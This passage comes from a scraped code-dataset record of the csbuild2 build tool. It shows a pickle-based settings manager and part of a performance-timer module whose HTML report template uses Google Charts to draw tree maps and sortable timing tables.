SOFTWARE.\n\n\"\"\"\n.. module:: settings_manager\n\t:synopsis: Manages persistent settings for csbuild\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport shutil\nimport threading\n\nimport sys\n\nfrom . import PlatformBytes\n\ntry:\n\timport cPickle as pickle\nexcept ImportError:\n\timport pickle\nfrom .. 
import perf_timer, log\n\n_sentinel = object()\n\nclass SettingsManager(object):\n\t\"\"\"\n\tSettings manager class that manages persistent settings, storing and reading from disk on demand.\n\n\t:param settingsDir: Directory to store the data in\n\t:type settingsDir: str\n\t\"\"\"\n\tdef __init__(self, settingsDir):\n\t\tself.settings = {}\n\t\tself.settingsDir = settingsDir\n\t\tif not os.access(settingsDir, os.F_OK):\n\t\t\tos.makedirs(settingsDir)\n\t\tself.lock = threading.Lock()\n\n\tdef Save(self, key, value):\n\t\t\"\"\"\n\t\tSave a value, which will be pickled at protocol 2 so it's supported by all Python versions.\n\n\t\t:param key: Key to store as. Must be a legitimate filename.\n\t\t:type key: str\n\t\t:param value: The value to store\n\t\t:type value: any\n\t\t\"\"\"\n\t\twith perf_timer.PerfTimer(\"SettingsManager save\"):\n\t\t\t#pylint: disable=not-context-manager\n\t\t\tself.settings[key] = value\n\n\tdef Persist(self):\n\t\t\"\"\"\n\t\tWrite all settings back to disk\n\t\t\"\"\"\n\t\tfor key, value in self.settings.items():\n\t\t\tdirFromKey = os.path.join(self.settingsDir, os.path.dirname(key))\n\t\t\tif not os.access(dirFromKey, os.F_OK):\n\t\t\t\tos.makedirs(dirFromKey)\n\t\t\tlog.Info(\"Storing settings for {}\", os.path.join(self.settingsDir, key))\n\t\t\twith open(os.path.join(self.settingsDir, key), \"wb\") as f:\n\t\t\t\tpickle.dump(value, f, 2)\n\t\t\t\tf.flush()\n\n\tdef Clear(self):\n\t\t\"\"\"\n\t\tRemove all persisted settings\n\t\t\"\"\"\n\t\tshutil.rmtree(self.settingsDir)\n\n\tdef Get(self, key, default=None):\n\t\t\"\"\"\n\t\tGet a value from the settings store\n\n\t\t:param key: Key to load. Must be a legitimate filename.\n\t\t:type key: str\n\t\t:param default: The default if no stored value exists\n\t\t:type default: any\n\t\t:return: The loaded value, or default if not found\n\t\t:rtype: any\n\t\t\"\"\"\n\t\twith perf_timer.PerfTimer(\"SettingsManager load\"):\n\t\t\t# Double-checked locking pattern\n\t\t\tret = self.settings.get(key, _sentinel)\n\t\t\tif ret is _sentinel:\n\t\t\t\t# pylint: disable=not-context-manager\n\t\t\t\twith self.lock:\n\t\t\t\t\tret = self.settings.get(key, _sentinel)\n\t\t\t\t\tif ret is _sentinel:\n\t\t\t\t\t\tpathFromKey = os.path.join(self.settingsDir, key)\n\t\t\t\t\t\tif not os.access(pathFromKey, os.F_OK):\n\t\t\t\t\t\t\tself.settings[key] = default\n\t\t\t\t\t\t\treturn self.settings[key]\n\n\t\t\t\t\t\twith open(pathFromKey, \"rb\") as f:\n\t\t\t\t\t\t\tdata = f.read()\n\t\t\t\t\t\t\tif sys.version_info[0] == 2:\n\t\t\t\t\t\t\t\tdata = data.replace(PlatformBytes(\"cUserString\"), PlatformBytes(\"ccollections\"))\n\t\t\t\t\t\t\t\tdata = data.replace(PlatformBytes(\"cUserList\"), PlatformBytes(\"ccollections\"))\n\t\t\t\t\t\t\tret = pickle.loads(data)\n\n\t\t\t\t\t\tself.settings[key] = ret\n\t\t\treturn ret\n\n\tdef Delete(self, key):\n\t\t\"\"\"\n\t\tDelete a value from the settings store if it exists. No-op if it doesn't.\n\n\t\t:param key: Key to delete. 
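# ---- Illustrative aside (not part of the source record above) ----
# Usage sketch for the SettingsManager above, assuming it is importable from
# its record path; the directory and key are hypothetical. Save() only
# updates the in-memory dict, Persist() pickles every entry to disk
# (protocol 2), and Get() lazily reloads missing keys under the lock.
from csbuild._utils.settings_manager import SettingsManager

mgr = SettingsManager("/tmp/hypothetical_settings")
mgr.Save("myproj.artifacts", {"main.o": ["main.cpp"]})
mgr.Persist()                                    # flush everything to disk
print(mgr.Get("myproj.artifacts", default={}))   # served from cache or disk
mgr.Delete("myproj.artifacts")                   # drop from cache and disk
# ---- End aside ----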
Must be a legitimate filename.\n\t\t:type key: str\n\t\t\"\"\"\n\t\t#pylint: disable=not-context-manager\n\t\twith self.lock:\n\t\t\tself.settings.pop(key, None)\n\t\t\tpathFromKey = os.path.join(self.settingsDir, key)\n\t\t\tif os.access(pathFromKey, os.F_OK):\n\t\t\t\tos.remove(pathFromKey)\n" }, { "alpha_fraction": 0.5787550210952759, "alphanum_fraction": 0.6103860139846802, "avg_line_length": 37.08538055419922, "blob_id": "a48dac7ea9f3604542720dc3c5e066ca8b71b3c3", "content_id": "5d9008f7bfde28e43e7fb8f5bd29604419be25b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32563, "license_type": "no_license", "max_line_length": 208, "num_lines": 855, "path": "/csbuild/perf_timer.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: perf_timer\n\t:synopsis: Thread-safe performance timer to collect high-level performance statistics\n\n.. moduleauthor:: Jaedyn K. 
Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport time\nimport threading\nimport re\nimport math\nimport sys\nimport os\n\nfrom collections import deque\n_collecting = True\n\nclass ReportMode(object):\n\t\"\"\"\n\tEnum defining the perf timer reporting mode.\n\t\"\"\"\n\tTREE = 0\n\tFLAT = 1\n\tHTML = 2\n\ndef EnablePerfTracking(enable=True):\n\t\"\"\"\n\tEnable (or disable) the perf timer.\n\n\t:param enable: True to enable the perf timer, False to disable.\n\t:type enable: bool\n\t\"\"\"\n\tglobal _collecting\n\t_collecting = enable\n\ndef DisablePerfTracking():\n\t\"\"\"\n\tHelper function for explicitly disabling the perf timer.\n\t\"\"\"\n\tEnablePerfTracking(False)\n\n_htmlHeader = \"\"\"<!DOCTYPE html><HTML>\n\t<HEAD>\n\t\t<title>Perf report for {0}</title>\n\t\t<script type=\"text/javascript\">\n\t\t\tvar scriptLoaded = false;\n\t\t\tfunction checkScriptLoaded() {{\n\t\t\t\tif (!scriptLoaded) {{\n\t\t\t\t\tdocument.getElementById(\"errorbar\").innerHTML=\"Could not contact gstatic.com to access google charts API.Tree maps will not be available until connection is restored.\";\n\t\t\t\t}}\n\t\t\t}}\n\t\t\tfunction _width(s, w) {{\n\t\t\t\ts = \"0000\" + s\n\t\t\t\treturn s.substring(s.length - w)\n\t\t\t}}\n\n\t\t\tfunction _formatTime(totaltime){{\n\t\t\t\ttotalmin = Math.floor(totaltime / 60)\n\t\t\t\ttotalsec = Math.floor(totaltime % 60)\n\t\t\t\tmsec = Math.floor((totaltime - Math.floor(totaltime))*10000)\n\t\t\t\treturn totalmin + \":\" + _width(totalsec, 2) + \".\" + _width(msec, 4)\n\t\t\t}}\n\t\t</script>\n\t\t<style>\n\t\t\t.hoversort {{\n\t\t\t \tcursor: pointer; cursor: hand;\n\t\t\t}}\n\t\t\t.hoversort:hover{{\n\t\t\t\tcolor:blue;\n\t\t\t}}\n\t\t\t.percentbar {{\n\t\t\t\theight:22px;\n\t\t\t\tbackground-color:#a060ff;\n\t\t\t\tmargin-top:-22px;\n\n\t\t\t}}\n\n\t\t\t.gradient {{\n\t\t\t\tbackground: rgba(235,233,249,1);\n\t\t\t\tbackground: -moz-linear-gradient(top, rgba(235,233,249,1) 0%, rgba(216,208,239,1) 50%, rgba(206,199,236,1) 51%, rgba(193,191,234,1) 100%);\n\t\t\t\tbackground: -webkit-gradient(left top, left bottom, color-stop(0%, rgba(235,233,249,1)), color-stop(50%, rgba(216,208,239,1)), color-stop(51%, rgba(206,199,236,1)), color-stop(100%, rgba(193,191,234,1)));\n\t\t\t\tbackground: -webkit-linear-gradient(top, rgba(235,233,249,1) 0%, rgba(216,208,239,1) 50%, rgba(206,199,236,1) 51%, rgba(193,191,234,1) 100%);\n\t\t\t\tbackground: -o-linear-gradient(top, rgba(235,233,249,1) 0%, rgba(216,208,239,1) 50%, rgba(206,199,236,1) 51%, rgba(193,191,234,1) 100%);\n\t\t\t\tbackground: -ms-linear-gradient(top, rgba(235,233,249,1) 0%, rgba(216,208,239,1) 50%, rgba(206,199,236,1) 51%, rgba(193,191,234,1) 100%);\n\t\t\t\tbackground: linear-gradient(to bottom, rgba(235,233,249,1) 0%, rgba(216,208,239,1) 50%, rgba(206,199,236,1) 51%, rgba(193,191,234,1) 100%);\n\t\t\t\tfilter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ebe9f9', endColorstr='#c1bfea', GradientType=0 );\n\t\t\t}}\n\t\t</style>\n\t</HEAD>\n\t<BODY onload=\"checkScriptLoaded()\">\n\t\t<div id=\"errorbar\" style=\"background-color:#ff0000\"></div>\n\t\t<script type=\"text/javascript\" src=\"https://www.gstatic.com/charts/loader.js\" onload=\"scriptLoaded=true;\" ></script>\n\t\t<h1>Perf Report: <i>{0}</i></h1>\n\"\"\"\n\n_blocks = [\n\"\"\"\t\t<div style=\"margin:2px 10px;padding: 5px 10px;background-color:lavender;border: 1px solid grey;\">\n\t\t\t<h3>{1}</h3>\n\n\t\t\t<div id=\"chart_div_{0}\"></div>\n\t\t\t<script 
type=\"text/javascript\">\n\t\t\t\tgoogle.charts.load(\"current\", {{\"packages\":[\"treemap\"]}});\n\t\t\t\tgoogle.charts.setOnLoadCallback(drawChart);\n\t\t\t\tfunction drawChart() {{\n\t\t\t\t\tvar data = new google.visualization.DataTable();\n\t\t\t\t\tdata.addColumn(\"string\", \"ID\");\n\t\t\t\t\tdata.addColumn(\"string\", \"Parent\");\n\t\t\t\t\tdata.addColumn(\"number\", \"Exclusive Time in Seconds\");\n\t\t\t\t\tdata.addColumn(\"number\", \"Inclusive time in seconds\");\n\t\t\t\t\tdata.addRows([\n\"\"\",\n\"\"\"\t\t\t\t\t]);\n\t\t\t\t\tvar tree = new google.visualization.TreeMap(document.getElementById(\"chart_div_{0}\"));\n\t\t\t\t\tfunction showFullTooltip(row, size, value) {{\n\t\t\t\t\t\treturn '<div style=\"background:#fd9; padding:10px; border-style:solid\">' +\n\t\t\t\t\t\t'<span style=\"font-family:Courier\"><b>' +\n\t\t\t\t\t\tdata.getValue(row, 0).split(\"\\x0b\").join(\"\").split(\"<\").join(\"&lt;\").split(\">\").join(\"&gt;\")\n\t\t\t\t\t\t+ ':</b>' + _formatTime(data.getValue(row, 2)) + ' seconds</span></div>'\n\t\t\t\t\t}}\n\t\t\t\t\tvar options = {{\n\t\t\t\t\t\thighlightOnMouseOver: true,\n\t\t\t\t\t\tmaxDepth: 1,\n\t\t\t\t\t\tmaxPostDepth: 20,\n\t\t\t\t\t\tminHighlightColor: \"#80a0ff\",\n\t\t\t\t\t\tmidHighlightColor: \"#ffffff\",\n\t\t\t\t\t\tmaxHighlightColor: \"#ff0000\",\n\t\t\t\t\t\tminColor: \"#7390E6\",\n\t\t\t\t\t\tmidColor: \"#E6E6E6\",\n\t\t\t\t\t\tmaxColor: \"#e60000\",\n\t\t\t\t\t\theaderHeight: 15,\n\t\t\t\t\t\tshowScale: false,\n\t\t\t\t\t\theight: 500,\n\t\t\t\t\t\tuseWeightedAverageForAggregation: true,\n\t\t\t\t\t\tgenerateTooltip: showFullTooltip\n\t\t\t\t\t}};\n\t\t\t\t\ttree.draw(data, options);\n\t\t\t\t}}\n\t\t\t</script>\n\t\t\t<script type=\"text/javascript\">\n\t\t\t\tvar datas_{0} = [\n\"\"\",\n\"\"\"\t\t\t\tfunction HideChildren_{0}(parentId) {{\n\t\t\t\t\t\tclassName = '{0}_Parent_' + parentId\n\t\t\t\t\t\telems = document.getElementsByClassName(className)\n\t\t\t\t\t\tarrowElem = document.getElementById(\"arrow_{0}_\"+parentId)\n\t\t\t\t\t\tfor(var i = 0; i < elems.length; ++i) {{\n\t\t\t\t\t\t\tvar elem = elems[i]\n\t\t\t\t\t\t\tif(elem.style.maxHeight == '0px') {{\n\t\t\t\t\t\t\t\telem.style.maxHeight=elem.rememberMaxHeight\n\t\t\t\t\t\t\t\tarrowElem.innerHTML = '&#x25bc;'\n\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t\telse\n\t\t\t\t\t\t\t{{\n\t\t\t\t\t\t\t\telem.style.maxHeight='0px'\n\t\t\t\t\t\t\t\tarrowElem.innerHTML = '&#x25b6;'\n\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t}}\n\t\t\t\t\t}}\n\n\t\t\t\t\tvar mode_{0} = \"tree\"\n\n\t\t\t\t\tfunction Flatten_{0}() {{\n\t\t\t\t\t\tret = {{}}\n\t\t\t\t\t\tfunction recurse(datas) {{\n\t\t\t\t\t\t\tif(datas.length == 0) {{\n\t\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t\tfor(var i = 0; i < datas.length; ++i) {{\n\t\t\t\t\t\t\t\tif(datas[i][0] in ret) {{\n\t\t\t\t\t\t\t\t\titem = ret[datas[i][0]]\n\t\t\t\t\t\t\t\t\titem[0] += datas[i][1]\n\t\t\t\t\t\t\t\t\titem[1] += datas[i][2]\n\t\t\t\t\t\t\t\t\titem[2] += datas[i][3]\n\t\t\t\t\t\t\t\t\titem[3] += datas[i][4]\n\t\t\t\t\t\t\t\t\titem[4] += datas[i][5]\n\t\t\t\t\t\t\t\t\titem[5] += datas[i][6]\n\t\t\t\t\t\t\t\t\titem[6] += datas[i][7]\n\t\t\t\t\t\t\t\t\titem[7] += datas[i][8]\n\t\t\t\t\t\t\t\t\titem[8] += datas[i][9]\n\t\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t\t\telse {{\n\t\t\t\t\t\t\t\t\tret[datas[i][0]] = 
[\n\t\t\t\t\t\t\t\t\t\tdatas[i][1],\n\t\t\t\t\t\t\t\t\t\tdatas[i][2],\n\t\t\t\t\t\t\t\t\t\tdatas[i][3],\n\t\t\t\t\t\t\t\t\t\tdatas[i][4],\n\t\t\t\t\t\t\t\t\t\tdatas[i][5],\n\t\t\t\t\t\t\t\t\t\tdatas[i][6],\n\t\t\t\t\t\t\t\t\t\tdatas[i][7],\n\t\t\t\t\t\t\t\t\t\tdatas[i][8],\n\t\t\t\t\t\t\t\t\t\tdatas[i][9]\n\t\t\t\t\t\t\t\t\t];\n\t\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t\t\trecurse(datas[i][10]);\n\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t}}\n\t\t\t\t\t\trecurse(datas_{0});\n\t\t\t\t\t\tretArray = []\n\t\t\t\t\t\tfor(var key in ret) {{\n\t\t\t\t\t\t\titem = ret[key]\n\t\t\t\t\t\t\tretArray.push([\n\t\t\t\t\t\t\t\tkey,\n\t\t\t\t\t\t\t\titem[0],\n\t\t\t\t\t\t\t\titem[1],\n\t\t\t\t\t\t\t\titem[2],\n\t\t\t\t\t\t\t\titem[3],\n\t\t\t\t\t\t\t\titem[4],\n\t\t\t\t\t\t\t\titem[5],\n\t\t\t\t\t\t\t\titem[6],\n\t\t\t\t\t\t\t\titem[7],\n\t\t\t\t\t\t\t\titem[8],\n\t\t\t\t\t\t\t\t[]\n\t\t\t\t\t\t\t]);\n\t\t\t\t\t\t}}\n\t\t\t\t\t\treturn retArray;\n\t\t\t\t\t}}\n\n\t\t\t\t\tvar prevSortKey_{0} = 1\n\t\t\t\t\tvar prevSortType_{0} = -1\n\t\t\t\t\tvar maxId_{0} = -1\n\t\t\t\t\tfunction Populate_{0}(sortKey) {{\n\t\t\t\t\t\tvar sortType = 1\n\t\t\t\t\t\tif(sortKey == 0) {{\n\t\t\t\t\t\t\tsortType = -1\n\t\t\t\t\t\t}}\n\t\t\t\t\t\tif(prevSortKey_{0} == sortKey && prevSortType_{0} == sortType) {{\n\t\t\t\t\t\t\tsortType *= -1\n\t\t\t\t\t\t}}\n\t\t\t\t\t\tprevSortKey_{0} = sortKey\n\t\t\t\t\t\tprevSortType_{0} = sortType\n\n\t\t\t\t\t\telem = document.getElementById(\"stack_{0}\")\n\t\t\t\t\t\tbg1 = \"#DFDFF2\"\n\t\t\t\t\t\tbg2 = \"#D3D3E6\"\n\t\t\t\t\t\tvar s = '<div style=\"border:1px solid black\"><div style=\"font-weight:bold;border-bottom:1px solid black;\" class=\"gradient\">'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:37%;display:inline-block;text-align:center;\" onclick=\"Populate_{0}(0)\">Block</span>'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;\" onclick=\"Populate_{0}(1)\">Inclusive</span>'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;\" onclick=\"Populate_{0}(2)\">Exclusive</span>'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;\" onclick=\"Populate_{0}(3)\">Count</span>'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;\" onclick=\"Populate_{0}(4)\">Inclusive Max</span>'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;\" onclick=\"Populate_{0}(5)\">Inclusive Min</span>'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;\" onclick=\"Populate_{0}(6)\">Inclusive Mean</span>'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;\" onclick=\"Populate_{0}(7)\">Exclusive Max</span>'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;\" onclick=\"Populate_{0}(8)\">Exclusive Min</span>'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;\" 
onclick=\"Populate_{0}(9)\">Exclusive Mean</span>'\n\t\t\t\t\t\ts += '</div>'\n\t\t\t\t\t\tvar id = 1\n\t\t\t\t\t\tfunction recurse(oneLevel, depth, parentId) {{\n\t\t\t\t\t\t\toneLevel = oneLevel.sort(function(a, b) {{\n\t\t\t\t\t\t\t\tvar x = a[sortKey]; var y = b[sortKey];\n\t\t\t\t\t\t\t\treturn ((x < y) ? 1 : ((x > y) ? -1 : 0)) * sortType;\n\t\t\t\t\t\t\t}});\n\t\t\t\t\t\t\tfor(var i=0; i < oneLevel.length; ++i) {{\n\t\t\t\t\t\t\t\tvar thisId = id;\n\t\t\t\t\t\t\t\tid += 1;\n\t\t\t\t\t\t\t\tif(thisId %2 == 0) {{\n\t\t\t\t\t\t\t\t\tbg1 = \"#C8C6F2\"\n\t\t\t\t\t\t\t\t\tbg2 = \"#B3B1D9\"\n\t\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t\t\telse {{\n\t\t\t\t\t\t\t\t\tbg1 = \"#BDBBE6\"\n\t\t\t\t\t\t\t\t\tbg2 = \"#A8A7CC\"\n\t\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t\t\ts += '<div style=\"width:100%;overflow:hidden;transition:max-height 0.5s linear\" class=\"{0}_Parent_'+parentId+'\", id=\"{0}_'+thisId+'\">'\n\t\t\t\t\t\t\t\ts += '<div style=\"line-height:22px;\"><span style=\"height:100%;width:37%;display:inline-block;background-color:'+bg1+'\" '\n\t\t\t\t\t\t\t\tif(oneLevel[i][10].length != 0) {{\n\t\t\t\t\t\t\t\t\ts += 'class=\"hoversort\" onclick=\"HideChildren_{0}(\\\\''+thisId+'\\\\')\"'\n\t\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t\t\ts += '><span style=\"width:20px;display:inline-block;margin-left:' + (depth * 15) + 'px;\" id=\"arrow_{0}_'+thisId+'\">'\n\t\t\t\t\t\t\t\tif(oneLevel[i][10].length != 0) {{\n\t\t\t\t\t\t\t\t\ts += '&#x25bc;'\n\t\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t\t\ts += '</span>' + oneLevel[i][0] + '</span>'\n\t\t\t\t\t\t\t\ts += '<span style=\"height:100%;width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;background-color:'+bg2+'\">' + _formatTime(oneLevel[i][1])\n\t\t\t\t\t\t\t\ts += '<div class=\"percentbar\", style=\"width:' + Math.min(100,oneLevel[i][1]/totals_{0}[0] * 100) + '%;\"></div>'\n\t\t\t\t\t\t\t\ts += '</span>'\n\t\t\t\t\t\t\t\ts += '<span style=\"height:100%;width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;background-color:'+bg1+'\">' + _formatTime(oneLevel[i][2])\n\t\t\t\t\t\t\t\ts += '<div class=\"percentbar\", style=\"width:' + Math.min(100,oneLevel[i][2]/totals_{0}[0] * 100) + '%;\"></div>'\n\t\t\t\t\t\t\t\ts += '</span>'\n\t\t\t\t\t\t\t\ts += '<span style=\"height:100%;width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;background-color:'+bg2+'\">' + oneLevel[i][3]\n\t\t\t\t\t\t\t\ts += '<div class=\"percentbar\", style=\"width:' + Math.min(100,oneLevel[i][3]/totals_{0}[1] * 100) + '%;\"></div>'\n\t\t\t\t\t\t\t\ts += '</span>'\n\t\t\t\t\t\t\t\ts += '<span style=\"height:100%;width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;background-color:'+bg1+'\">' + _formatTime(oneLevel[i][4])\n\t\t\t\t\t\t\t\ts += '<div class=\"percentbar\", style=\"width:' + Math.min(100,oneLevel[i][4]/totals_{0}[2] * 100) + '%;\"></div>'\n\t\t\t\t\t\t\t\ts += '</span>'\n\t\t\t\t\t\t\t\ts += '<span style=\"height:100%;width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;background-color:'+bg2+'\">' + _formatTime(oneLevel[i][5])\n\t\t\t\t\t\t\t\ts += '<div class=\"percentbar\", style=\"width:' + Math.min(100,oneLevel[i][5]/totals_{0}[3] * 100) + '%;\"></div>'\n\t\t\t\t\t\t\t\ts += '</span>'\n\t\t\t\t\t\t\t\ts += '<span style=\"height:100%;width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;background-color:'+bg2+'\">' + _formatTime(oneLevel[i][6])\n\t\t\t\t\t\t\t\ts += 
'<div class=\"percentbar\", style=\"width:' + Math.min(100,oneLevel[i][6]/totals_{0}[4] * 100) + '%;\"></div>'\n\t\t\t\t\t\t\t\ts += '</span>'\n\t\t\t\t\t\t\t\ts += '<span style=\"height:100%;width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;background-color:'+bg2+'\">' + _formatTime(oneLevel[i][7])\n\t\t\t\t\t\t\t\ts += '<div class=\"percentbar\", style=\"width:' + Math.min(100,oneLevel[i][7]/totals_{0}[5] * 100) + '%;\"></div>'\n\t\t\t\t\t\t\t\ts += '</span>'\n\t\t\t\t\t\t\t\ts += '<span style=\"height:100%;width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;background-color:'+bg2+'\">' + _formatTime(oneLevel[i][8])\n\t\t\t\t\t\t\t\ts += '<div class=\"percentbar\", style=\"width:' + Math.min(100,oneLevel[i][8]/totals_{0}[6] * 100) + '%;\"></div>'\n\t\t\t\t\t\t\t\ts += '</span>'\n\t\t\t\t\t\t\t\ts += '<span style=\"height:100%;width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;background-color:'+bg2+'\">' + _formatTime(oneLevel[i][9])\n\t\t\t\t\t\t\t\ts += '<div class=\"percentbar\", style=\"width:' + Math.min(100,oneLevel[i][9]/totals_{0}[7] * 100) + '%;\"></div>'\n\t\t\t\t\t\t\t\ts += '</span></div>'\n\t\t\t\t\t\t\t\trecurse(oneLevel[i][10], depth + 1, thisId)\n\t\t\t\t\t\t\t\ts += \"</div>\"\n\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t}}\n\t\t\t\t\t\tvar datas;\n\t\t\t\t\t\tif(mode_{0} == \"flat\") {{\n\t\t\t\t\t\t\tdatas = Flatten_{0}();\n\t\t\t\t\t\t}}\n\t\t\t\t\t\telse {{\n\t\t\t\t\t\t\tdatas = datas_{0};\n\t\t\t\t\t\t}}\n\t\t\t\t\t\trecurse(datas, 0, 0)\n\t\t\t\t\t\ts += '</div>'\n\t\t\t\t\t\telem.innerHTML = s\n\t\t\t\t\t\tfor(var i = 0; i < id; ++i) {{\n\t\t\t\t\t\t\tclassName = '{0}_Parent_' + i\n\t\t\t\t\t\t\telems = document.getElementsByClassName(className)\n\t\t\t\t\t\t\tfor(var j = 0; j < elems.length; ++j) {{\n\t\t\t\t\t\t\t\tvar elem = elems[j]\n\t\t\t\t\t\t\t\telem.style.maxHeight = Math.max(22, elem.clientHeight) + \"px\"\n\t\t\t\t\t\t\t\telem.rememberMaxHeight = elem.style.maxHeight\n\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t}}\n\t\t\t\t\t\tmaxId_{0} = id\n\t\t\t\t\t}}\n\n\t\t\t\t\tfunction ExpandAll_{0}() {{\n\t\t\t\t\t\tfor(var i = 1; i < maxId_{0}; ++i) {{\n\t\t\t\t\t\t\tclassName = '{0}_Parent_' + i\n\t\t\t\t\t\t\telems = document.getElementsByClassName(className)\n\t\t\t\t\t\t\tarrowElem = document.getElementById(\"arrow_{0}_\"+i)\n\t\t\t\t\t\t\tfor(var j = 0; j < elems.length; ++j) {{\n\t\t\t\t\t\t\t\tvar elem = elems[j]\n\t\t\t\t\t\t\t\telem.style.maxHeight=elem.rememberMaxHeight\n\t\t\t\t\t\t\t\tarrowElem.innerHTML = '&#x25bc;'\n\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t}}\n\t\t\t\t\t\treturn false;\n\t\t\t\t\t}}\n\n\t\t\t\t\tfunction CollapseAll_{0}() {{\n\t\t\t\t\t\tfor(var i = 1; i < maxId_{0}; ++i) {{\n\t\t\t\t\t\t\tclassName = '{0}_Parent_' + i\n\t\t\t\t\t\t\telems = document.getElementsByClassName(className)\n\t\t\t\t\t\t\tarrowElem = document.getElementById(\"arrow_{0}_\"+i)\n\t\t\t\t\t\t\tfor(var j = 0; j < elems.length; ++j) {{\n\t\t\t\t\t\t\t\tvar elem = elems[j]\n\t\t\t\t\t\t\t\telem.style.maxHeight='0px'\n\t\t\t\t\t\t\t\tarrowElem.innerHTML = '&#x25b6;'\n\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t}}\n\t\t\t\t\t\treturn false;\n\t\t\t\t\t}}\n\n\t\t\t\t\tfunction RenderTreeView_{0}() {{\n\t\t\t\t\t\tif(mode_{0} != \"tree\") {{\n\t\t\t\t\t\t\tmode_{0} = \"tree\";\n\t\t\t\t\t\t\tprevSortType_{0} *= -1\n\t\t\t\t\t\t\tPopulate_{0}(prevSortKey_{0})\n\t\t\t\t\t\t\telem = document.getElementById(\"expandcollapse_{0}\")\n\t\t\t\t\t\t\telem.style.opacity = 
100\n\t\t\t\t\t\t\telem.style.visibility = \"visible\"\n\t\t\t\t\t\t}}\n\t\t\t\t\t\treturn false;\n\t\t\t\t\t}}\n\n\t\t\t\t\tfunction RenderFlatView_{0}() {{\n\t\t\t\t\t\tif(mode_{0} != \"flat\") {{\n\t\t\t\t\t\t\tmode_{0} = \"flat\";\n\t\t\t\t\t\t\tprevSortType_{0} *= -1\n\t\t\t\t\t\t\tPopulate_{0}(prevSortKey_{0})\n\t\t\t\t\t\t\telem = document.getElementById(\"expandcollapse_{0}\")\n\t\t\t\t\t\t\telem.style.opacity = 0\n\t\t\t\t\t\t\telem.style.visibility = \"hidden\"\n\t\t\t\t\t\t}}\n\t\t\t\t\t\treturn false;\n\t\t\t\t\t}}\n\n\t\t\t</script>\n\t\t\t<div>\n\t\t\t<div style=\"border:1px solid black;padding:0px 6px\">\n\t\t\t\t<div style=\"float:left;transition:opacity 0.5s, visibility 0.5s\" id=\"expandcollapse_{0}\">\n\t\t\t\t\t<a href=\"javascript:;\" onclick=\"ExpandAll_{0}()\">expand all</a> |\n\t\t\t\t\t<a href=\"javascript:;\" onclick=\"CollapseAll_{0}()\">collapse all</a>\n\t\t\t\t</div>\n\t\t\t\t&nbsp;\n\t\t\t\t<div style=\"float:right\">\n\t\t\t\t\tView as:\n\t\t\t\t\t<a href=\"javascript:;\" 